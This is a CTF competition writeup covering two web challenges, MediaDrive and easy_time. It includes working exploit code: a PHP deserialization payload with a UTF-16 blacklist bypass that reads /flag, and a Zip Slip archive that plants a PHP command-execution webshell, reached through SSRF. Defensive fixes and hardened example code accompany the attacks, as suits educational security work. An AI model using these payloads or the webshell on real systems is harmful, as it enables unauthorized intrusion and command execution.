19th National College Student Information Security Contest / 3rd "Great Wall Cup" Network and Digital Intelligence Security Competition: Semifinal Personal Writeup
March 22, 2026
I'm really done playing these.
Web - MediaDrive
Attack
The User object's properties are never validated after deserialization, and preview.php applies its blacklist before the encoding conversion, so the blacklist can be bypassed with an encoding such as UTF-16: the NUL bytes between the UTF-16 code units mean the raw bytes never contain the forbidden substrings, and only after iconv-style conversion does the real path appear. First construct the User object:
<?php
class User {
    public $name = "guest";
    // preview.php converts $f from this encoding, but only after the blacklist check
    public $encoding = "UTF-16";
    // empty basePath, so the decoded "/flag" is used as an absolute path
    public $basePath = "";
}
$obj = new User();
// urlencode so the serialized blob survives being sent as a cookie value
file_put_contents("user.txt", urlencode(serialize($obj)));
Then read the file:
import requests

TARGET = "http://[REDACTED]/preview.php"

# serialized, URL-encoded User object produced by the PHP snippet above
user_obj = open('user.txt', 'rt').read()

# "/flag" as UTF-16 bytes (with BOM); the blacklist looks for ASCII "flag",
# which never occurs in the NUL-interleaved byte string
filepath = "/flag".encode("utf-16")

response = requests.get(TARGET,
                        params={"f": filepath},
                        cookies={"user": user_obj})
response.raise_for_status()
with open("resp.html", "wt") as f:
    f.write(response.text)
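To make the ordering bug concrete, here is an added Python model of the two variants of preview.php's path handling; this is illustrative code, not the challenge source or the author's exploit. The function names, the blacklist contents and the encoding whitelist (a subset of the one used in the defense below, limited to codecs Python ships) are all assumptions. The vulnerable variant checks the raw bytes and then transcodes, exactly the order the writeup describes; the hardened variant whitelists the encoding, transcodes first, then checks and confines the result to the base directory.

```python
# Added example (not code from the original writeup or the challenge source):
# a Python model of the ordering bug in preview.php. Function names, the
# blacklist terms and the encoding whitelist are assumptions.
import os
from typing import Optional, Sequence

BLACKLIST = (b"flag", b"..", b"/etc/")   # assumed blacklist terms


def blacklist_hit(data: bytes) -> bool:
    """True if any forbidden substring occurs (case-insensitive)."""
    lowered = data.lower()
    return any(bad in lowered for bad in BLACKLIST)


def vulnerable_resolve(raw: bytes, encoding: str, base_path: str) -> Optional[str]:
    """Original order: blacklist on raw bytes, THEN transcode.

    UTF-16 '/flag' is b'\\xff\\xfe/\\x00f\\x00l\\x00a\\x00g\\x00'; the NULs
    between the letters mean b'flag' is never a substring, so the check passes.
    """
    if blacklist_hit(raw):
        return None
    path = raw.decode(encoding)        # models iconv($encoding, "UTF-8", $f)
    return base_path + path            # basePath came from the cookie: "" + "/flag"


def hardened_resolve(raw: bytes, encoding: str, base_path: str,
                     allowed: Sequence[str] = ("UTF-8", "GBK", "BIG5")) -> Optional[str]:
    """Whitelist the encoding, transcode FIRST, then check and confine to base_path."""
    if encoding not in allowed:
        encoding = "UTF-8"
    try:
        path = raw.decode(encoding)
    except UnicodeDecodeError:         # UTF-16 bytes are not valid UTF-8
        return None
    if blacklist_hit(path.encode("utf-8")):
        return None
    base = os.path.normpath(base_path)
    full = os.path.normpath(os.path.join(base, path))
    # os.path.join discards base for an absolute path and normpath collapses
    # '..', so one prefix test catches both escape routes.
    if not full.startswith(base + os.sep):
        return None
    return full


if __name__ == "__main__":
    payload = "/flag".encode("utf-16")
    print(vulnerable_resolve(payload, "UTF-16", ""))   # "/flag": bypassed
    print(hardened_resolve(payload, "UTF-16", "/var/www/html/uploads/",
                           allowed=("UTF-8", "UTF-16")))  # None: caught after transcoding
```

Even when UTF-16 is explicitly permitted, the hardened order still rejects the payload, because the check runs on the decoded string; the whitelist is a second, independent layer.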
Defense
Add property checks in lib/User.php. Note that unserialize() of a cookie stays risky even with these checks; at minimum pass ['allowed_classes' => ['User']] as its second argument so no other class can be instantiated, and preview.php should transcode before applying its blacklist rather than after.
<?php
declare(strict_types=1);
class User {
    public string $name = "guest";
    public string $encoding = "UTF-8";
    public string $basePath = "/var/www/html/uploads/";
    public function __construct(string $name = "guest") {
        $this->name = $name;
    }
    // __wakeup() runs as soon as unserialize() rebuilds the object, so the
    // cookie-supplied values are replaced before preview.php ever reads them.
    public function __wakeup() {
        // only encodings the application actually needs; UTF-16 is out
        if (!in_array($this->encoding, ["UTF-8", "GBK", "BIG5", "ISO-2022-CN-EXT"], true)) {
            $this->encoding = "UTF-8";
        }
        // basePath is not user-configurable at all
        if ($this->basePath !== "/var/www/html/uploads/") {
            $this->basePath = "/var/www/html/uploads/";
        }
    }
}
Web - easy_time
Attack
From the provided attachment, the target runs Apache + PHP internally on port 80 and exposes a Flask app to the outside. Auditing the Python code shows that Zip uploads are actually handled by the safe_upload method, which does not defend against Zip Slip, and that the fetch_remote_avatar_info method does not block requests to local addresses, so it can be used as an SSRF to reach the PHP side and bring back the response. First build a Zip carrying a PHP webshell:
import zipfile

# Entry name traverses out of the extraction directory into Apache's docroot;
# the extractor joins it onto the destination without checking the result.
with zipfile.ZipFile('evil.zip', 'w') as zf:
    zf.writestr(
        '../../../var/www/html/cmd.php',
        '<?php var_dump(system($_GET["c"]));\n'
    )
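The two weaknesses named above (an extractor that honours '..' in entry names, and a fetcher that will happily request internal hosts) are shown side by side in the following added example. It is illustrative code, not the challenge's Flask app or the author's exploit; naive_extract, safe_extract and is_internal_target are assumed names, and the evil and benign archives in the demo are constructed inline.

```python
# Added example (not code from the original writeup or the challenge's Flask app):
# a Zip Slip extractor of the kind the writeup describes, a hardened one, and a
# loopback/private-address guard of the kind fetch_remote_avatar_info lacked.
# All function names are assumptions.
import ipaddress
import os
import socket
import tempfile
import zipfile
from urllib.parse import urlsplit


def naive_extract(zip_path: str, dest: str) -> list:
    """Writes every entry to dest + name without checking where that lands.
    A name like '../../../var/www/html/cmd.php' therefore escapes dest."""
    written = []
    with zipfile.ZipFile(zip_path) as zf:
        for info in zf.infolist():
            target = os.path.join(dest, info.filename)   # '..' is honoured here
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(target)
    return written


def safe_extract(zip_path: str, dest: str) -> list:
    """Canonicalise every target and refuse anything outside dest.
    Symlink entries are rejected too: a link pointing outside dest, followed by
    a later entry written through it, is the other classic escape."""
    root = os.path.realpath(dest)
    written = []
    with zipfile.ZipFile(zip_path) as zf:
        for info in zf.infolist():
            name = info.filename
            if os.path.isabs(name) or name.startswith(("/", "\\")):
                raise ValueError(f"absolute entry name rejected: {name!r}")
            if ((info.external_attr >> 16) & 0o170000) == 0o120000:   # S_IFLNK
                raise ValueError(f"symlink entry rejected: {name!r}")
            target = os.path.realpath(os.path.join(root, name))
            if target != root and not target.startswith(root + os.sep):
                raise ValueError(f"path traversal rejected: {name!r}")
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(target)
    return written


def is_internal_target(url: str) -> bool:
    """True if the URL's host resolves to a loopback, private, link-local or
    otherwise non-public address, i.e. must not be fetched server-side."""
    host = urlsplit(url).hostname
    if not host:
        return True
    try:
        addrs = {ai[4][0] for ai in socket.getaddrinfo(host, None)}
    except socket.gaierror:
        return True                       # unresolvable: fail closed
    for addr in addrs:
        ip = ipaddress.ip_address(addr)
        if (ip.is_loopback or ip.is_private or ip.is_link_local
                or ip.is_reserved or ip.is_multicast or ip.is_unspecified):
            return True
    return False


if __name__ == "__main__":
    root = tempfile.mkdtemp()
    evil = os.path.join(root, "evil.zip")          # constructed demo archive
    with zipfile.ZipFile(evil, "w") as zf:
        zf.writestr("../escaped.txt", "pwned")
    dest = os.path.join(root, "uploads")
    os.makedirs(dest)
    naive_extract(evil, dest)
    print("naive wrote outside dest:", os.path.exists(os.path.join(root, "escaped.txt")))
    try:
        safe_extract(evil, dest)
    except ValueError as e:
        print("safe refused:", e)
    print(is_internal_target("http://127.0.0.1/"), is_internal_target("http://8.8.8.8/"))
```

The address check resolves the name once, at check time; a host whose DNS answer changes between the check and the actual fetch (DNS rebinding) slips past it, so in production the fetch itself should be pinned to the vetted address, and redirects must be re-checked hop by hop.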
For login, the cookie has no validation at all; set one yourself and you are logged in as admin:

After uploading the Zip, use the PHP shell to find the flag:

Tags: #CTF #Writeup #CISCN #Web
This article is authored by luoingly and licensed under CC BY-NC 4.0